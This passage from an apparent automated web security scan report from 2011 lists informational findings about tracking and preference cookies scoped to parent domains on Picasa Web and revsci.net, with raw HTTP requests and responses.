<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

11.148. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=6NXM3fXR2MZvZJyQlq6Ntg; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Tue, 01 Feb 2011 15:37:02 GMT
Date: Tue, 01 Feb 2011 15:37:02 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=qlLRwQUXMinW; Path=/; HttpOnly
Set-Cookie: S=photos_html=6NXM3fXR2MZvZJyQlq6Ntg; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

11.149. https://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=HabRy8TtYMirRpvtu_aMGg; Domain=.google.com; Path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Tue, 01 Feb 2011 15:37:03 GMT
Date: Tue, 01 Feb 2011 15:37:03 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=XpHedKSTpGC1; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=HabRy8TtYMirRpvtu_aMGg; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

11.150. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeO4blIOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOro8aE=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
udm_0=MLvvNSMNLjpn3gfUDF7BVtAE7s3J6sMsniyxP0ZTGyb0XVS2KCsE++vMKpQLnK3thbdS17nLkt+9I3dBJD4N4xnSKIOw4HD33Ndw3hjVKeJM3aPiaeU8exMDPzNyKFLRF3DdxRZ9sIqeEr0SmFCcxSI9dIKQy0cM793jCrbVqYUB2pih6N3lS/5cGPTHtmlDpDvLEriKHIo8fVN6aflYfmlnjFc3B2TTk+L1ZbkqRfqhMSTXblcL09J671ocAbO5eb5JdW0oPODoRSt8qhdsvA4ZM9epbUpgoE4vYUrR/GKSVeHQDsZNx0tyOCaX3w7BKhZ0lSxxpvwAz1Zc2msetwfxBg0EoXYSdlPd7GEv82FoKEV/c2IzOf/oOsPaVuhmcV2LLJSCO0QDGQ8CLW2o8XoqsbL8bodNogQcgbODuI9fNvprOKBAqYBTvIFC4AnRpEm1RrB4KQ70sYNJlkPYOQo3UsN51S/UkNOZxkIHoJXDsx0L0apRXhGxtEov0nVkA4jJw9bvS1FTGnr9Mui7IgnCpiing6ol+IRaug0X/VOOX/YJvEJvQbyTyMthA2vA4zSS3ZCM+kWtfX8Pho+A+ExcSAGgPFLnVXV4fJc5tKUY1FBoDMIN7VayV9LJeHtWbbZpTVyaCEy0X4fPvBLeRZYdpDnYR+LOw5t35v6d96Er6bNeNlAq8P/93JiIIuXStnIOsckpYuEoD+UzM7QfKx1ktCQ0RKXzJYilYm3Z90VH9ONOnzgp3puwhxCmR740VS47A+ixXoDwsI9d4ae9moH/gYnQL/mz+XxfuytLCNDC8+WjYu2gSpUmwDXYaUXo/8eDrdJ7NC1mIlpHsBkSzDN9j0o5t7EtrJXmQ/T/z84aJs9zsXyujZcXNjZsY8Hy9wJbAsfH8Riof6sRz5fLCwTC8veC4wRBxvE4xpciHSP+yNJJi9yBJ/2dCRgVtTqrufLq9EgENIh+mwHUtfRjFPV5xI5tEvinw9OmttRc7Iyk2hrAo9BxjpbiUuzpbtWouUOCs+dHz8uEo18LLwMEFo0u1k3FOWh4E9ED2pPabo4f2s+0yaSN8JYoGPcnWSfVMVS81rJjwNYjPOk3QfI/3IaU3xJWtSrU24BMPMUfpPLVqj4Q/zfcdNOcqMkaLxUEGO8qDFtoGQ2BbMj5JIvC8L/xP8+oSfTcSyBQVUTy5A0KGn7pKOjc2C4Tb9uDqty1Q0yaEAVd7aKc6b7usBbZn/fWLbkwYtBGn302niPv; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
rtc_0=MLsvsdUvcS5nJgFEV8O6cA+ssydxFuQPjAyWrSbmZ3Xbl2Rd84FlLVUeISQkZPpq3+/yS+PtxMQT7DslgE+EiBPc1PKM2t+/EOpB4uLrf6GOWya56Dc3gwsoLE781CimXk//GxJynTvaxdqPo1TcXMqyUtwfAzZ2jEbLM1yrYRos7UmLXPcfXiav1mZjU936ZROamqN/fqWS2Q8yar3w1E6Mfwg1R0eyXhh40tZ4iA4m0+aATuP7UocbTVUX5CteZOewKvL7JQQ5iXH7fo8MQylSc1kX/hS/g/6bpKvFkJnlV1iuL3q3JzvhB63Bg7LVssbJt+9XzCTI6mQ2/Y6Is6AG6Ik9cGuVmbjBM+7LXLoebV5kaXjFu+yaDGqJ7tVTKsz3xzzEwV//3BfuqMZMpvXSVZESCesOKM8lj7vQGCuI2IJGrayPJ4SRCJ0=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvoT8h7Ts3xm/ap8Mkb9Q+GVTuR5n80ave3qy14HbyO8+Tcni3oWJVsXNJZ2BoNcclQkVAkXBr3QjDZUGqY/VB76lycBkbXZ/PmM5ZvqG73GQvL4NN3zYvKIXx9zvKHgRcUGOKdYPdUASY9ojdIV8gYJGQFNpzGY2z0gWMDX4TxCEac8R3Ke9ppb194xfECkX2pU1O1iHFy42uElW4j5+v/f8eKkFQ5MzvYE/jyv/rdQiQ09Ai+GU/SjsOZnNQhSBqoMRy93up9vn3PUZA45DM7V+v2Zgn8PXHeSPS85ij7VFR9oQiUVQO38lZzBhUE4hFvl3EkuGg0bi17IV4EBRVWiGu2RmG1QDm5JKJTNslOkv1LdL89z3GMvpJmvs+T5vdyHmAWeZtfRM9cFdfQGSZJjmNUVtgqHDCEiPN0vrW3gnfNbz8nrxNp/cOhwEmsOuhPOMUp+bhkRfmz9kYr5Jnari/GTw58CYqV8h4rzD7qgsc6K4ko5+gPLeQCL5fF69RvQ7fHNZCY0Wgm6mdclFvksFmiNCBpS9srXF7bYyO3+oeVB4D8j5B9nxiUjybPaivGWNDOgiQD79UoUb73FJ7Wm2q4yQrEhX1SpimuhPzRYA0qz7LRvSc3Zoyp+uKsqctxrNIF98i4/5zjBOYg6j/oTeItuQpdMgnyCRARTjQVRzDG96I9Zo6QAEqZ+Y0Iv7BJZL6jkVTjliHFn3FYRW3KH63Oo2bPpUYPX3DgLj6a3b3noH5DkkVQsOSyax16pb5DFwSyDDHu/ugupu5TH8NhEFXauRtWMQprWMn/RWgZFUzttuV9+nL1UnJeHsmWcaceq2g5cjxG1QCGzBbIio/mVhYuhpLzriZs7gmMWx57OH6EAkOz81CWKdorEUgfK0LHu/h+pCNMEHMQhgIlyLysXM8hjqWOr2q1JiFiQmE8C5vXaiir/3o/JYyvxUU0zqT2uM0qnKPCWoCbsd3re35olXtVu8xecblsDX5g66gqZsTE6PDW8nGDZGkIdAGFJ7PZeycd5UmrQSEfWKf4cgvbrqXv0XExi2hrQTYXR0Ql4YjukjJ8J5wlmXH0J4hY3uL+VfDSeK4BvrrNJu19JkjkefmVpbC4yYpcu0I0IY4u43Hkcwa1LL+N8+mYbQTmfoGF5IQ+frCKYD5ncwZ04oRqB8G8Y3clOManGAsTIJJC1Hgb3tiZMPDnWHX1HKz

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeO4blIOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOro8aE=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNSMNLjpn3gfUDF7BVtAE7s3J6sMsniyxP0ZTGyb0XVS2KCsE++vMKpQLnK3thbdS17nLkt+9I3dBJD4N4xnSKIOw4HD33Ndw3hjVKeJM3aPiaeU8exMDPzNyKFLRF3DdxRZ9sIqeEr0SmFCcxSI9dIKQy0cM793jCrbVqYUB2pih6N3lS/5cGPTHtmlDpDvLEriKHIo8fVN6aflYfmlnjFc3B2TTk+L1ZbkqRfqhMSTXblcL09J671ocAbO5eb5JdW0oPODoRSt8qhdsvA4ZM9epbUpgoE4vYUrR/GKSVeHQDsZNx0tyOCaX3w7BKhZ0lSxxpvwAz1Zc2msetwfxBg0EoXYSdlPd7GEv82FoKEV/c2IzOf/oOsPaVuhmcV2LLJSCO0QDGQ8CLW2o8XoqsbL8bodNogQcgbODuI9fNvprOKBAqYBTvIFC4AnRpEm1RrB4KQ70sYNJlkPYOQo3UsN51S/UkNOZxkIHoJXDsx0L0apRXhGxtEov0nVkA4jJw9bvS1FTGnr9Mui7IgnCpiing6ol+IRaug0X/VOOX/YJvEJvQbyTyMthA2vA4zSS3ZCM+kWtfX8Pho+A+ExcSAGgPFLnVXV4fJc5tKUY1FBoDMIN7VayV9LJeHtWbbZpTVyaCEy0X4fPvBLeRZYdpDnYR+LOw5t35v6d96Er6bNeNlAq8P/93JiIIuXStnIOsckpYuEoD+UzM7QfKx1ktCQ0RKXzJYilYm3Z90VH9ONOnzgp3puwhxCmR740VS47A+ixXoDwsI9d4ae9moH/gYnQL/mz+XxfuytLCNDC8+WjYu2gSpUmwDXYaUXo/8eDrdJ7NC1mIlpHsBkSzDN9j0o5t7EtrJXmQ/T/z84aJs9zsXyujZcXNjZsY8Hy9wJbAsfH8Riof6sRz5fLCwTC8veC4wRBxvE4xpciHSP+yNJJi9yBJ/2dCRgVtTqrufLq9EgENIh+mwHUtfRjFPV5xI5tEvinw9OmttRc7Iyk2hrAo9BxjpbiUuzpbtWouUOCs+dHz8uEo18LLwMEFo0u1k3FOWh4E9ED2pPabo4f2s+0yaSN8JYoGPcnWSfVMVS81rJjwNYjPOk3QfI/3IaU3xJWtSrU24BMPMUfpPLVqj4Q/zfcdNOcqMkaLxUEGO8qDFtoGQ2BbMj5JIvC8L/xP8+oSfTcSyBQVUTy5A0KGn7pKOjc2C4Tb9uDqty1Q0yaEAVd7aKc6b7usBbZn/fWLbkwYtBGn302niPv; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
Set-Cookie: rtc_0=MLsvsdUvcS5nJgFEV8O6cA+ssydxFuQPjAyWrSbmZ3Xbl2Rd84FlLVUeISQkZPpq3+/yS+PtxMQT7DslgE+EiBPc1PKM2t+/EOpB4uLrf6GOWya56Dc3gwsoLE781CimXk//GxJynTvaxdqPo1TcXMqyUtwfAzZ2jEbLM1yrYRos7UmLXPcfXiav1mZjU936ZROamqN/fqWS2Q8yar3w1E6Mfwg1R0eyXhh40tZ4iA4m0+aATuP7UocbTVUX5CteZOewKvL7JQQ5iXH7fo8MQylSc1kX/hS/g/6bpKvFkJnlV1iuL3q3JzvhB63Bg7LVssbJt+9XzCTI6mQ2/Y6Is6AG6Ik9cGuVmbjBM+7LXLoebV5kaXjFu+yaDGqJ7tVTKsz3xzzEwV//3BfuqMZMpvXSVZESCesOKM8lj7vQGCuI2IJGrayPJ4SRCJ0=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 297
Date: Wed, 02 Feb 2011 15:11:18 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['D08734_72132','D08734_72122','D08734_72123','D08734_72125','D08734_72126','D08734_71432'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D087
...[SNIP]...

11.151. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/102504215.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF+BTCGI0VkQ0a9c=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ab&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/102504215.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF+BTCGI0VkQ0a9c=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:23 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ab&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:23 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:22 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.152. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/1084292.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iATaSM0VkT/a+o=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/1084292.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
